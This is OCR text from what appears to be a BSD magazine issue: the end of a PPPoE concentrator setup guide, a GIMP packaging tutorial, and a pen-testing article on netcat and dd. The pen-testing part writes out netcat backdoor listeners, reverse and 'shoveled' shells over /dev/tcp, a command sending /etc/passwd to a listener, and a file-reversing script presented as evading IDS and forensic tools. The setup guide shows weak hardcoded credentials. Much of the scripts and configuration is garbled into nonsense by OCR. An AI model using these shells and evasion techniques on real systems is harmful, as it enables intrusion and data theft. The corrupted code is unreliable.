if [ SSS = Spass ] 
then 
c user= Sradius”select Username  erom todcneck where uscermame= 9 Shimtt. ie” 2>  /dev/nuil) 
if [ “echo $XX | tr [:upper:] [:lower:]~” = “echo $c _ user | tr [:upper:] [:lower:]° ] 
then 
SUdOmSee = room =p e2270 Oe oie 0G 2 / 2ooe/ serious, Coa emande sh Oe ON OOe I> 7/ 
dev/null 


echo “<hr> Customer “$XX” with speed changed to “SWW”kb download and “S$QQ”kb upload. <hr>” 
echo “Customer “SXX” with speed changed to “SWW”kb download and “SQQ”kb upload the 
date ‘“date’.” >> /tmp/sst_log 
echo “Customer “SXX” with speed changed to “SWW”kb download and “SQQ”kb upload the 
date ‘date’.” >> /var/log/messages 


echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo 2 orem” 
exit 0 
else 
Cone <tt> Usieicre: anvalidos <tnu> 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New guery”>’ 
echo i) foun 
exit 0 
fi 
else 
echo “<hr> Invalid Password, this event will be logged for security reasons. <hr>” 
echo “Attempt to access invalid, password “SSS” the date “date.” >> /tmp/sst_log 
echo “Attempt to access invalid, password “SSS” the date ‘date’.” >> /var/log/messages 
echo ‘<form method="link” action="sst”">’ 
echo ‘<input type="submit” value="New query”>’ 
echo ton: 
exit 0 
fi 
fi 
echo. “<br>” 
fi 
echo “<form meunod=" Link™ vaciL ron ssl =” 
echo ‘<input type="submit” value="New guery”>’ 
echo [foam 


echo ‘</body>’ 
Seno. </ Himll >” 


exit 0 


#teof 
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GC 1p ursi= echo 24 | cul =d’.% <21° 
/usr/local/sbin/softflowctl -c /usr/local/etc/mpd5/ 
netflow/$1.ctl shutdown 
else 
c ip6=$4 
fi 


Consider 203.0.113.15:700 as the ip:port of the NetFlow 
collector. Create startup scripts: Listing 29. 

Permissions to be executable: Listing 30. 

Permissions to be executable: 


# chmod +x /root/scripts/ppp-down 


The following script overturns daily customers that have 
been blocked: Listing 31. 


Permissions to be executable: 
# chmod +x /root/scripts/drop blocked 
Add it to cron to run daily: 


# crontab -e 


00. 21 * * ©. f/root/scripts/drop. blocked 


This script serves to drop the client locally, but in a 
forced manner: Listing 32. 
Permissions to be executable: 


# chmod +x /root/scripts/drop force 


I’m using radvd to generate RA and quagga for redistri- 
bution. It could be done with rtadvd or dhcpv6; the most 





Listing 35. 
NOK eGaphOececeeoums I, 


events { 


Wonker jeoumecr Lome | 1024, 


Heep 4 
include mime.types; 

default type application/octet-stream; 

Seugimle on; 

een OCC a edmle Ol wales, 

larson lneewkere calmleomir N25 

Kkeepa lives eimeout oy, 

sionel iabmeouw. 0), 

Clitenty ood ye our bem esuze ROK 

Cen Mane ac = aol ihe meet Ze mlia, 

e Pen ta ilermo OcK~as lz cme my, 


Tange se lenin neade~ soUnbenS 7), 


server { 
Pecten IZ OO IE eNO) 
PeSwe AUS D0) ABIES rer sly 
server name localhost, 


Seis ics mE Ole Mom Omer, 


location / { 
root /usr/local/www/nginx; 


index index.html index.htm; 





lecation /sst { 
root /usr/local/www/nginx/sst; 

Dds < aes See On. 

rewrite (.*)$S /S$1.cgi break; 

BeSIEClop, fOeisis Dhol oe By nwelia//teUial//se(elopt iyieclyoy/ ticle = 


Wise Oma Oe lay 


fastcgi_ param SCRIPT FILENAME /usr/local/ 
www/nginx/Sfastcgi_ script name; 
include Paseegmepatanls,, 
allow 208s UL T1326 9/ 32: 
deny eulnie, 
} 
error page 500 502 503 504 /50x.html; 


li®catione— 9) 50. mem 


root /usr/local/www/nginx-dist; 


server { 
2G Us ooo. 
Velie lla; 


listen 


server name 


charset utf-8; 


location / { 


OO occ MEE 7) LZ 0 (rae any 7 


#eof 
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Figure 6. nf_traffic 


558.7 Mb/s top: 476.9 Mb/s udp: 81.7 Mb/s icmp: 40.4 kb/s other: 753.8 b/s 
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Listing 36. 


# cat /root/.log.io/harvester.conf 
exports.config = { 
nodeName: “pppoe”, 
logStreams: { 
vVelnal as | 
Oia log modoe loa, 
] 
}, 


server: { 
INO ete tes lead Oe Oenlke 
Oe eee wn Oa 


} 
#eof 


i ere Joo) «hog nko) log Semvcie «cComit 
exports.config = { 

host: ‘127.0.0.1’, 

jsroucie.s © INOUE 


} 
#eof 


Tieden, GOO, mlOgn1e, Welbon SekVcmncoms 
exports.config = { 

host: ‘127.0.0.1’, 

seucie IK Ose- 


/* 
// Enable HTTP Basic Authentication 





auth: { 
user: “admin; 
pass: “1234” 

}, 

ll 

/* 

// Enable HTTPS/SSL 

sols { 


key: ‘/path/to/privatekey.pem’, 
cert: ‘/path/to/certificate.pem’ 
}, 
a), 


/* 
// Restrict access to websocket (socket.io) 
// Uses socket.io ‘origins’ syntax 
Pestrictoockets Y*27" 
z/ 

/* 
// Restrict access to http server (express) 
rest e1etHilTe: || 


Pile Ta 


oy) 


#eof 
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important thing is that the mpd5 provides a connection 
via link-local client-server. It is not interesting that the 
irqs stay changing between cores of processors, so let’s 
fix them, bearing in mind that this can vary depending on 
your hardware. Create the rc for cpu_affinity: Listing 33. 

Now let’s create the cgi script for support: Listing 34. 
Permissions to be executable: # chmod +x /usr/local/www/ 


nginx/sst/s$st.cq1. 


Let’s configure sudo, otherwise you will have permission 
issues with nginx when using the SST. 
Add these lines at the end of the file: 


# vi /usr/local/etc/sudoers 
User Alias WEB = www 


WEB ALL = NOPASSWD: /usr/bin/ssh 


Let’s set nginx for support system, log system and infor- 
mative for blocked customers. 


edit /usr/ local/etc/nginx/nginx cont: Listing 35, 


Listing 37. 


i: UOUCIN 7 User) ocaly cud) kead) log 10 
feenmod (oo ¥/ust/ loealy/ere, ve.d/ log a0 


# cat /usr/local/etc/re.d/log io 

#!/bin/sh 

#written by tfgoncalves (at) connectionlost (dot) com(dot) br 

#1414503716 

# REQUIRE: LOGIN 

# 

# Add the following lines to /etc/rce.conf to enable log. 
1o-server and log.io-harvester at startup 

if Og etOM(DOOU IG seu to, NOM sby deraiiic:. 

# Sel it to “YES” to enable log. 10-server 


and log.io-harvester 
» fetc/rc.subr 
Mame LOGO. 
Cycle Se meC yahoos elCec 
#rcvar=log io enable 
load ere yeonic =. mam-= 


>: S{log_ io enable:=NO} 


start cmd="S{name} start” 





Create a blocked informative page, it may contain cus- 
tomer area and others, creativity is the limit! 


# vi /usr/local/www/nginx/index.html 
<html> 
<head> 
<title></title> 
</head> 
<body> 
<p? 
Customer blocked, contact the Company Lorem 
Ipsum. </p> 
</body> 
</html> 


Let’s configure postfix, edit the /etc/mail/aliases, uNn- 
comment the root and input your email address to re- 
ceive important information from your server. 

Run the line below to that postfix runs on localhost to 
start functioning properly: 


WT 


stop cmd="S{name} stop 


og meme earn () 

{ 

echo: “Starcing log. o-server. ” 
/usr/local/bin/log.io-server 2>&1 >/dev/null & 
echo “Starting log.io-harvester.” 
/usr/local/bin/log.io-harvester 2>&1 >/dev/null & 


} 


Kegulomeroe() 
{ 


CChe> “SrEOOING, LOG.10-server. 





echo“ Stoping Log.10 harvester.” 
Juse/oin/kililalienode 2>6ile>/dey/ aul 
} 


CUM ae me OMmene Sale 


#eof 
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Figure 7. pppoe_en 


# postconf -e ,alias maps = hash:/etc/mail/aliases” && 
postconf -e ,inet interfaces = localhost’ && rm -rf / 
etc/mail/aliases.db && newaliases && postalias /etc/ 


mail/aliases 
Let’s set the log.io: Listing 36. Create the rc for log.io: 


Listing 37. 
Permissions to be executable: 


# chmod +x /usr/local/etc/rce.d/log io 


Access your support system -> http://203.0.113.5/sst/sst 
and authentication logs -> http://203.0.113.5:666/. 
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simple topology for implementation of 
pppoe concentrator 


lf you got this far, your work is accomplished, set to run! 
For any questions | am available by email: tigoncalves(at) 
connectionlost(dot)com(dot)br. The feedback may take time 
because mail flow here is a little high, but i will reply. Con- 
tributions and new ideas are always welcome. bsd rOx! [| s 


TIAGO FELIPE GONCALVES 
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Getting to Grips with 
the Gimp - Part 9 


In the penultimate part in our series on the Gimp we will 
look at how to create a 3d package for a FreeBSD carton that 
is print ready. 





What you will learn... What you should know... 
« How to manipulate images like a design pro ¢ General PC administration skills 


spective tool that could potentially used for packaging any 
product. The key to this is accuracy and scaling, as any mis- 
match will ruin the final image. 


n this tutorial we will create a realistic 3D object using the per- 





Download the images from Table 1. 
Table 1. Details and credits 

Resource Oe Details and credit 
FreeBSD website | https:/,www.freebsd.org/logo/logo-basic.png | FreeBSD Logo and fonts 
CPU core http://www.freeimages.com/photo/759887 Gold roubles 

10 russian gold roubles 
and CPU by styf22 
Power button http://www.freeimages.com/photo/675014 Power Button 

Hard drive power button 
by jmonte 


























BSD 11/2014 


MAGAZINE 


| 


Getting to Grips With the Gimp - Part 9 








Step 1 Beewwy a 
Open the CPU image [Figure 1]. RfMQAe+ & | 
SBARAH MA : 
“ps s/s 8 4+ &, 
ae a oe oe 4 
= 











zr 
o i e & ¥ 
Step 2 Bee. 4e & | 
: : *@a a. & 4 
Rescale the image to 2800px with the : = es = a A 
constraint disabled [Figure 2]. Ans sala | 
&h682#@ 4 w @ 
r 
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Step 3 Bee v.4e& | 
Select Layer — Layer to image size. |i “GA #4 | 
Use the colour picker tool, selectare- | * a : . : | 
gion in the core of the CPU andfillthe |: x aaae | 
right hand side of the expanded image Cy 7 
[Figure 3]. ‘SRODMe9 5 | 
—= ! 
al 
| 
| 
I 
ns 
; @ a, @ var ‘ 


Step 4 

Create a new layer and click back on 
the original layer. Select some CPU 
pins from the lower left hand side us- 
ing the lasso tool, copy the selection 
and paste into the new layer. Tempo- 
rarily reduce the opacity of the layer 
while aligning so you can overlay the 
pins accurately [Figure 4]. 


>| 


a3 
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Step 5 

Open the FreeBSD logo image and 
select and copy the transparent Red 
Daemon sphere. Create a new layer 
in the CPU image and paste the re- 
sult. Click on the scale tool and en- 
sure the constrain is enabled. Scale 
the image to neatly overlay the coin 
[Figure 5, 6]. 


Step 6 

Add a new layer. Hide all the other lay- 
ers. Copy the transparent FreeBSD 
text in black into the new layer. With 
constrain enabled, scale to 1500px 
and anchor the layer. Add a new layer. 
Set the foreground colour to #ff3300, 
select a square bounding box around 
“BSD” and fill with red. Repeat with 
the “Free” text and fill with white. Set 
the layer to Addition. Reveal the other 
layers and move the FreeBSD text to 
the edge of the CPU die. Select Layer 
— Layer to image size [Figure 7]. 
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Step 7 

Set the resolution of the image to 300 
pixels/in in both axis (Image — Scale). 
Create a new image with the same 
resolution 760 x 3884 pixels. Select 
the light and dark blue from the left 
hand side of the original image using 
the pick tool and set the foreground 
and background accordingly. Switch 
to the new image and use the gradient 
blend tool to fill the new image [Fig- 
ure 8]. 


Step 8 

Scale both the side and front images 
to 50% constrained. Open the hard 
drive light image and use the clone 
tool to remove the symbol engraved 
on the right hand side. Crop so that 
the switches are central [Figure 9]. 
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Getting to Grips With the Gimp - Part 9 


Step 9 

Add a new layer to the side image and 
paste then scale the switches so they 
line up in the centre of the image. Add 
“The power to serve’ text adjusting 
the kerning and size to fix the maxi- 
mum width. Set the switch layer to 
hard light [Figure 10]. 


Step 10 

Merge visible layers on both imag- 
es. Create a new page with a white 
background 3000 x 2500 px. Add a 
guide at 50% of the vertical (Image 
— Guides by percent). Add a horizon- 
tal guide part way down the from the 
top of the page. Create two new lay- 
ers, copy and paste the side image 
and front images into separate layers. 
Add two vertical guides one aligned 
against the 'P' and one intersecting 
the “S” [Figure 11]. 
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Step 11 

Click on the left hand layer and using 
the square selection tool, outline the 
left hand panel. Click on the perspec- 
tive tool and alight the vertical axis to 
match the left-hand guide then click 
on Transform. Anchor the layer. Re- 
peat with the right hand panel and the 
right hand guide [Figure 12]. 


Step 12 

Merge down the two layers, and add 
a shadow with 0 x offset and 20 y off- 
set and blur radius. Give the shadow 
a 40% opacity. Crop and export as re- 
quired [Figure 13]. 


ROB SOMERVILLE 

Rob Somerville has been passionate about 
technology since his early teens. A keen advo- 
cate of open systems since the mid-eighties, he 
has worked in many corporate sectors includ- 
ing finance, automotive, airlines, government 
and media in a variety of roles from techni- 
cal support, system administrator, develop- 
er, systems integrator and IT manager. He 
has moved on from CP/M and nixie tubes but 
keeps a soldering iron handy just in case. 
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Pen Testing and Audit. Part 3 





Pen Testing and Audit. This comes in handy when engaged 
in a penetration test. In the event that you find a shell, it 
may not be feasible to upload large amounts of data, but 
netcat is small (and also exists natively on many UNIX/LINUX 
systems). Next, there is a port of Netcat for Windows. This 
means that it can be loaded into a Windows network over a 


shell exploit. 


nce on the internal host, you can extend what you 
have done by scanning the internal network — IN- 
SIDE the firewall. 


Netcat - the tester’s best friend 

Sending to and from separate hosts is possible. The idea 
here is to have netcat setup as a listener on the host that 
is collecting the data and for it to be running on a host that 
is spoofing * the source address. The “-s” address local 
source address option and the fact that netcat has the “-g” 
source-routing hop point options add to this ability. 

The “-wN” usage options defines the buffered send- 
mode that selects one line every N seconds. Another op- 
tion that can be considered is to hexdump (to stderr or to 
a specified file) of transmitted and received data. 


Vulnerability Scanning with Netcat 

Netcat has a number of pre-existing scripts that can allow 
it to act as a simple vulnerability scanner. It does this by 
connecting to the port to be tested, entering data to test 
a vulnerability and returning the result. A number of the 
commonly available test scripts include those for: 


1. RPC (Remote Procedure Calls) — both the *NIX (Port 
111) and Windows (Port 135) versions 

2. FIP (proxy tests, PASV bugs, etc.) 

3. Password testing (along the lines of Brutus) — that is 
you can try a dictionary attack and test a system's 
passwords 
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4. Map and export a file system 

5. Test trust relationships (Such as the “R” commands) 

6. SSL -— yes there is an SSL capable version of netcat 
and it can be used to test SSL links 

7. A Web and CGI scanner 

8. Many more ... 


Reporting the results is another issue; you know that the 
vulnerability is there, the output is just not pretty. 

Then there is scripting again: 
# “perl -e ‘print “A”x1024'° nc -v 
A little fuzzing never hurt... But then again... In the perl 
sample above, we see how we can send large volumes 


of script to a listening port. This all goes to show how a 
simple command can be made into a truly powerful tool. 


Testing and making connections to open ports with 
Netcat 

When testing a system, netcat has a few things you should 
remember: 


¢ Itis faster than a speeding Telnet. 

¢ Easy to drop with a CTRL-C 

¢ Handles raw data in a single bound 

Yes, it’s not a bird or a plane, it is netcat. Netcat is far 


faster than Telnet without the overhead and translation. 
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This makes it superior for forensic data transfers. Unlike 
Telnet, netcat does not add characters. 

Next, netcat can connect over UDP. This means it can 
be used as a simple “Telnet” client and server — even over 
UDP. You set up communications as follows: 


On the Server: 


# ne. -l =p [port] -e /bin/csh 
Or in Windows — 
cmd.exe’. 

lf the aim is to have a UDP “telnet” style client over UDP 
53, just run: 


“C:\ nc -l -p [port] -e C:\windows\ 


7 ne —l = =p 53 -e /bin/esh 
Can we say a simple backdoor? 


On the Client: 


# nc [ServerIPAddress] [port] 
So to connect to the listener above on UDP 53 at IP ad- 
dress 192.168.10.123 we would use: 


* me =U 192.100.120.123. 53 


It is all really easy when you think about it. This is why 
it is SO EASY to bypass firewalls and routers that allow 
DNS traffic (or any default rules). This is why it is CRITI- 
CAL that there are restrictions on all rules that have ANY 
system to ANY system access. 


Acting as a virtual server or honeypot 

Netcat can simulate any TCP or UDP service; the binary 
ones are far more complicated, but are still possible. If we 
take the simple example of a Web server that we wish to 
create as a honeypot, the process is to serve a page and 
log the results. 


Make a webserver: 

while true; do nc -l -p 80 -q 1 < /tmp/index.html; done 
Run the script line above, then you could log the netstat 
and other packets, setup snort, etc. Or you could inte- 


grate logging: 


cat { while read; do echo “’date’ > SREPLY”>> log.txt; 


echo SREPLY; done; } nc -l1 -—p 80 -q 1 < /tmp/index.html 
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{ while read; do echo “‘date’ < SREPLY” >> log.txt; 
echo SREPLY; done; } 


To add a proxy or client header and fool simple systems: 


# nc google.com 80 GET / HTTP/1.1Host: google.comUser- 
Agent: Mozilla Version 2800.1 (one day)Referrer: Not. 


my.site.com 


To make a log with times, etc., the script needs to be spawn’d 
— but the idea is there. This can be done for nearly any service 
or port but, of course, there are always simpler ways to do this. 


Netcat — the simple port-scan logger 

The following is a small script to make Netcat into a sim- 
ple Port Scan Logger. A little more and it can become 
a simple Honeypot: 


# while true; do nc -1 -p [port to monitor] -e /bin/ 


record.sh >> /tmp/port_connections.txt 


This calls a script, /bin/record.sh. There are other 
ways to do this, but this is a quick and easy example. 
This script is as follows: 


#! /bin/sh 

# port mon.sh 

# Netcat script to record port scan details. 

# 

cat { while read; do echo “’date’ > SREPLY”>> log.txt; 
echo SREPLY; done; } netcat -v -v +l =—w 3 [port . 

monitored] { while read; do echo “‘date < SREPLY” >> 


log.txt; echo $REPLY; done; } 


This logs all connections to a single port from an IP ad- 
dress. This is a continuous loop. That is, when a connec- 
tion is made, netcat will be respawned and ready to re- 
cord another attempt. 

Alternatively, we can log to syslog by adding: 


“echo ‘<Q>message’ nc -w 1 -u log host 514” 


Now, if we want to monitor several ports, a little extra 
scripting and we have a simple port scan monitor. 


(for f in $(seq 1 254); do while true ; do nc -v -w3 -z 
Sf; done) 


Netcat to send files 


Netcat helps in sending files. We can tar and compress 
(or gzip) the files contained within a specified directory 
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and then pipe the data through a netcat client. The “—w” 
option can provide a few seconds of delay prior to a time- 
out. This covers the problem of temporary disconnects 
and intermittent traffic flow. 

To move the file from a listener to the netcat client we 
first need to configure a listener. 


# nc -l -p 53 < /tmp/the file name.bin 
Next, a client. 
#nc [IP Address of Listener] 


Pushing a file from the client to the netcat listener. 
Again, we setup a listener. 


# nc -l1 -p 53 > /tmp/the file we want to copy.bin 
And the client. 
#nc [IP Address of Listener] 53 < /tmp/The File we saved.bin 


This is just the reverse of what we did at first. This allows 
the sending or receiving of files. These files are sent in 
binary format, but this also allows text to be sent. Some 
issues can occur (and require translation) when sending 
from *NIX to Windows. 


Netcat is also able to be used as a Forwarder and Relay 
| am not going to go into detail here but, if you think about 
it, there is no reason why a single netcat listener is the end 
of what you can do. Chaining netcat can allow it to pass 
multiple layers and systems. In Pen-tests, Red Teaming 
and even on the darker side of the fence, this technique is 
used to “drill” through firewalls and security systems. 

More than this, netcat can chain across different pro- 
tocols. It is possible to pipe one connection type into an- 
other. A connection to DNS (UDP 53) can be changed to 
HTTP (TCP 80), etc. 

All of this just touches the surface of what netcat does. 
| would suggest that you search and find out more. There 
are always more uses of netcat. 


Netcat as a Trojan 
Netcat can also be used as a backdoor into a system and 
a remote shell. It is all too easy... 

Once you have run the script on the host that you wish 
to Trojanise, use telnet to connect to it as follows: 

The following starts netcat in listen mode. 


#nc -l -p [port] -e /bin/ksh 
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Of course, you can listen on either TCP or UDP. In fact, 
adding this line to a start-up script could allow you to se- 
lectively send connections to a valid service or the “Trojan”. 

For instance, if you can obtain shell access through 
a DNS vulnerability with BIND, you could load a netcat 
startup and allow future access while patching the issue 
to stop further attacks. Even simple tools can be used in 
both positive and negative ways. 


A replay attack engine 
Netcat can be used as a replay attack engine. It works 
well for this purpose and is simple to use. The first part is 
to actually collect the information stream (the data) that 
you want to replay. This can be done by using another 
tool to create the stream or just capture (tcpdump or wire- 
shark) a stream and alter the parts that do not fit. 
Change the times, IP addressing, destinations, values, 
etc. to make the captured stream suit what you want. 
To replay the data, netcat in client mode will suffice: 


S cat file.capture.bin nc [destination IP] [port] 


or even: 


S$ nc [destination IP] [port] <> 
Either will work. Either netcat in listen mode, tcpdump, 
wireshark or tcprelay can be used to make the initial 
capture. TCPRelay works better for this task, but netcat 
just looks cooler (in a geek sense). 

Hence, netcat can be used to replay packets. 


Egress filtering and netcat 

First | had better explain to everyone what Egress filters 
are. Most people understand the idea of Ingress filtering. 
This is stopping things coming into the network. Most peo- 
ple will agree that letting anything into the network from 
the Internet willy-nilly is a bad idea. But what are Egress 
filters and why are they necessary? 

An Egress filter is a block on traffic leaving your net- 
work. This may not sound too nefarious, but it is not just 
the insiders who can damage your network from the in- 
side. An external attacker can “push” a session from the 
client to a listener. That is they can make a shell connec- 
tion from your server using outgoing traffic to get an in- 
coming connection to your internal systems. 


Shoveling a shell 

You may think that it is not possible to get an incoming 
shell from the Internet because you block incoming traf- 
fic. If you do, you are mistaken. There is an attack method 
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known as shoveling a shell or just a shoveling shell. Net- 
cat is acommon tool for launching this attack. The attack- 
er would setup netcat as follows: 

Listener: 


ne.=l. =p [port no] 


Client: : nc [listenerIP] [port] -e /bin/sh 

The firewall will see this as an outgoing connection from 
the system. It is, in reality, an incoming interactive shell. It 
is also a common way of using that buffer overflow con- 
dition — take your pick of the latest one hitting the streets. 

Generally, the client is activated at regular intervals 
through cron. This is completed by activating a netcat 
server and waiting for the connection from the system 
being attacked. The system being attacked is generally 
configured using a common port that is generally allowed 
through your firewall and expected. Ports such as TCP 25 
(SMTP), TCP 80 (HTTP) or TCP 443 (HTTPS) are used. 
If the attacker is really smart, they will tie the connection 
to UDP and bind it to something like UDP 53 (DNS) as it 
is rarely blocked. (nc -u: UDP Mode). 

The result — the attacker has a command shell to your 
system through your firewall. This even works on firewalls 
that block ALL incoming traffic. As a tester, you can do the 
same, as packet filters are easily fooled, a good proxy lev- 
el firewall is not — but there are fewer and fewer of these 
being used. 

The worst thing, is that tools such as metasploit (http:/ 
www.metasploit.com/) make this even easier. They bun- 
dle the exploit and tools into a single payload that even a 
novice script kiddie can use. So filter that outgoing Inter- 
net Traffic before it is too late! 


Oops - | forgot to install netcat... 

Netcat does not exist on all systems. It is common on ma- 
ny Linux systems, but less commonly installed on UNIX. 
In the event that netcat is not installed as a client program 
on a system, and when we cannot install netcat, there are 
options in both /dev/tcp and /dev/UDP: 


/dev/tcp/[IPaddress]/[port] 
/dev/ucp/ [IPaddress]/ [port] 


So for our UDP 53 example this becomes: 
/dev/ucp/192.168.10.123/53 
For the shell this becomes: 


0<&1l 2>&1 
0<&1l 2>&1 


/bin/csh -i > /dev/tcp/[IPaddress]/ [port] 
/bin/csh -i > /dev/ucp/[IPaddress]/ [port] 
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And hence, we can obtain the functionality of netcat with 
the tools and devices that exist on any *NIX system. As 
an example, the script line below shovels a shell from 
the target host to a waiting Netcat listener. We can enter 
commands on the host that act as a reverse shell. 


jbin/esh =1-> .dev/ucp/197.160.10.123/53: 0<el 2oel 


The critical point is that we can use netcat on our local 
system even when the remote system under test does 
not have netcat. And, of course, if netcat is not installed 
on the client, we can still use a makeshift client such as: 


# cat /etc/passwd> /dev/tcp/[IP_ Address of Listener] / 


[Listener Port 


Filtering connections 

An exercise to try is to setup restrictions on the source IP 
that is allowed to connect. Netcat can be configured to 
accept connections only from a predefined source IP ad- 
dress. This makes the connection operate like TCP_Wrap- 
pers and is seminal to a firewall for the individual service. 


Sending compressed files 

In this example, the data received is piped into tar. By 
running tar with the “v” option (or verbose) we can see 
the filenames — they are printed to SDOUT (generally the 
screen). Omit this if you want to script this or otherwise 
automate this process (less noise). To compress the out- 
put, also run tar with the “z” flag. This will automatically 


run the gzip compression program over the output. 


Note 

Not all implementations of tar support the “z” flag and 
it may be necessary to pipe the tar’d output to gzip in 
a separate step. 


To do this we use the commands: 


Client 
# tar cfpz - /[directory path]/[File] /bin/nce -w 3 [Desti- 
nation Host 1P] [bastener-Port] 


or for an entire directory, just: 


# tar cfpz - /[directory path] /bin/nc -w 3 [Destination _ 
Host. IP] [bistener=Port] 


Listener 


# nc -l -p [Listener-Port] tar xfpvz - 
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On the listener we reverse the process in this example 
and restore the files. 

For the details on how to use tar see: http:/,www.linux- 
command.org/man_pages/tar1.html. 


Alternatively 

Together, dd and netcat make a great way to either back- 
up a system (and all slack, etc.) or to remotely obtain a fo- 
rensically sound copy of a partition, drive, memory, etc. 
Say we want to make an image of /dev/hdb1 (a partition, 
but the entire drive can also be copied with /dev/ndb), we 
can use the following commands: 


Client 

# dd if=/dev/hdal nc -v -w 15 [Netcat Listener IP] 1200 
Listener 

# nc -l1 -v -w 15 -p 1200 dd of=/tmp/image hdb.dd 


There are other options with dd that can be incorporat- 
ed and | have these in other posts. In this case, | have 
used TCP 1200 as the port, but this can be anything that 
is not in use. Also, UDP can be used, as well, but there 
is a larger chance of error. 

This image can now be cloned to other hosts, used as 
a backup to be restored to the original, if needed, or used 
for forensic analysis. You can also test the system remote- 
ly without leaving a further trail. 


DD 
DD is the Swiss army knife of file tools — with /dev/tcp it 
can also be a network tool (but nc is simpler). 

First we need the basics for DD. For this we have the 
man page and some definitions. | have taken (blatantly 
paraphrased) the man file info for DD and included this 
below (which is simple to obtain — “man dd”). 

For the purpose of a task such as reversing files and swap- 
ping them, we need to concentrate on the following options: 


¢ bs — This is block size. Setting “bs=1” means that 
we can use dd as a bit level (instead of a block level) 
tool. Although it does slow down the process from a 
block copy, we are not looking at how fast we can co- 
py here. 

¢ skip — this tells us to skip “n” blocks. In our case, we 
want “n” bits. 

What we are going to do is start at the value of “n” set to 

our last bit in the file. We will loop the dd function to next 
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copy bit “n — 1°, then “n — 2’, ... to “n=1". This means n 
gets copied to bit 1, “n — 1” to bit 2, ..., bit 1 to bit n. 

In other words we need to copy bit “n — 1” in the source 
file to bit “i-— n” in the destination file. 


How to reverse a file with dd 
Reversing a file is actually fairly simple, a small shell script 
code executed with the length of the file (based on the 
sector size) is all that is required. You can either use a de- 
fault block size (where the individual blocks will be moved 
into a reverse order), or set the block size to 1 in order to 
completely reverse the file. The flag, “bs=1” is added in or- 
der to copy the entire file in reverse — bit by bit. 

If the size of the file and its name are known beforehand, 
the script is particularly simple (note that this script uses the 
‘count command, which is not found on all systems): 


°J] = [file size] 

SF=[file to copy] 

for. 4. in “count. 0-57" % do 

dd conv=noerror bs=1 count=1 skip=(Si) if=SF > /($3j).out 


done 


In the event that you do not know the size of the file, 
the following script can be used, or if you want to in- 
corporate this in to a script that changes multiple files 
at once you need to feed more information into the 
script (including a file descriptor). This script is a lit- 
tle messy (I have not made any effort to tidy it up), but 
does the trick. 


#! /bin/bash 

This is a small utility script that will reverse the 

file that a user inputs 

It is not coded securely and presumes the directory for a 
number of command - change 

this to run it in a real environment. The main thing is 
a proof of concept anti-forensic tool. 

This script by reversing files will make the file 
undetectable as a type of file by commercial 


file checkers. Run it in reverse to get the original back. 


S$ $= =F =F |= FSF FSF FS FE FH OF 


Author: Craig S Wright 


#Set the file to reverse 
echo “Enter the name (and path if necessary) of the file 
you want to reverse:”; read FILE 

#i Work out the file size 

SIZE OF FILE="/bin/ls ~l OFILE | awk “{prane 95)7" 


1=0 
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#The script - not pretty - but the idea was all I was 


# aiming at 


K=‘expr $SIZE OF FILE - $i° 
/bin/dd conv=noerror bs=1 skip=$K if=SFILE count=1 > 
SPILE .owt 


i= expr $i + 1° 
J Plus="expr $SIZE OF FILE + 1° 


while [ “$i7% != “SJ Plus” ] 

do 

K=‘expr $SIZE OF FILE - $i° 

/bin/dd conv=noerror bs=1 skip=SK if=SFILE count=1 >> 
SPILE Out 

i= expr $i + 1° 


done 


To go a little further and add some options, | have in- 
cluded the following example. | have NOT added input 
checking or other NECESSARY security controls. This 
is quick and nasty only. Please fix the paths and input 
checking if you want to run it. 

The following script is called reverse.sh: 


#! /bin/bash 
# 

# reverse.sh 
# 

# Set the file to reverse - I DO NOT check if the file 
# actually exists - you should! 

echo “Enter the name 


(and path if necessary) of the file 


you want to reverse:”; read FILE 


# Default File output = FILE.out 
PILE OUl= 38 LLE. out 


# Set the file where the reversed file is to be saved - I DO 
# NOT check if the file actually exists - you should! 

echo “Enter the name (and path if necessary) of the file 
you want the output saved as (must be different to the 


input):”; read SFILE OUT 


#Set the Block Size. This will default to BS=1 for dd 

BS SIZE=1 

echo “Enter the Block Size 
BS SIZE 


(the default = 1 bit):”; read 


#1 Work out the file size 
SoLZE OF FILE= /bin/ls -L oPibe | awk *{print 95}°~ 
1=0 
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#The script - not pretty - but the idea was all I was 


# aiming at 


K=‘expr $SIZE OF FILE - $i° 
/bin/dd conv=noerror bs=$BS SIZE skip=$K if=SFILE count=1 
> $FILE OUT 


i= expr $i + 1° 
J Plus="expr $S5IZE OF FILE + 1° 


while [ “$i” != “$J Plus” ] 

do 

K=‘expr $SIZE OF FILE - $i° 

/bin/dd conv=noerror bs=$BS SIZE skip=$K if=SFILE count=1 
>> SFILE OUT 

i= expr $i + 1° 


done 

# The end... 

To use the previous script enter: 
S ./reverse.sh 


Enter the name of the file you want to reverse and the 
block size (best left at 1 bit). This will return the bitwise 
reversed file. If you want to verify it — run it twice and use 
“diff” to validate that the same file is returned. This will 
reverse the reverse and get the original back. 

This works on text and binary files and, with a little 
tweaking, you can reverse headers but leave the body the 
same, reverse the body after skipping the file header and 
many more options. 

| have yet to find a forensic tool that will find reversed 
text if you are not looking for it. Also, this is a simple way 
of passing tools when an IDS/IPS is in use. The reversed 
files are not found in default scans. This has been tested 
with several of the leading IDS products. In all cases, it 
was possible to send tools without setting an alert. 

With time and practice, you can create a loader script 
that will take the reversed file and execute it directly into 
memory. This leaves no copy of the original file to be un- 
covered with a Host based IDS. 

The script example above has the file output written 
without checking if a file exists. The following is an exam- 
ple of how you can add a small amount of script to verify 
that you are not overwriting an existing file: 


if [| -f SFILE ] 
then 
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echo “The file [SFILE] that you are seeking write already exists” 


echo “Do you want to overwrite the existing file? ( y/n ) : \c” 
read RESPONSE 

if [ “SRESPONSE” = “n” ] || [ “SRESPONSE” = “N” ] 

then 


echo “The file will not be overwritten and the process will abort!” 
exit 

fi 

fi 


It is also a good idea to use the full path in a script. Us- 
ers can change the path variables they are exposed to 
and, unless you set these (either explicitly or by adding a 
profile for the script to use), an attacker could use a sys- 
tem script to run their own binary. 

The key to successfully testing a system and validating 
the security state of that system is to think outside the box. 
For instance, there are several reasons why you would 
want to reverse a file for testing: 

e « Attackers could do this to bypass filters, controls 
and other protections 

Anti-forensics, finding the needle in a haystack is 
difficult - esp. when the tools do not help 

Pen Testing — just as in point 1 for attackers, the 
tester can use this to load tools without being detect- 
ed by filters or through malware detection engines 


Once a file has bypassed the perimeter controls, get- 
ting it to work inside an organization is simple. Hence, 
a means to bypass controls is of interest to those on the 
attack side of the equation (both validly and less so). 

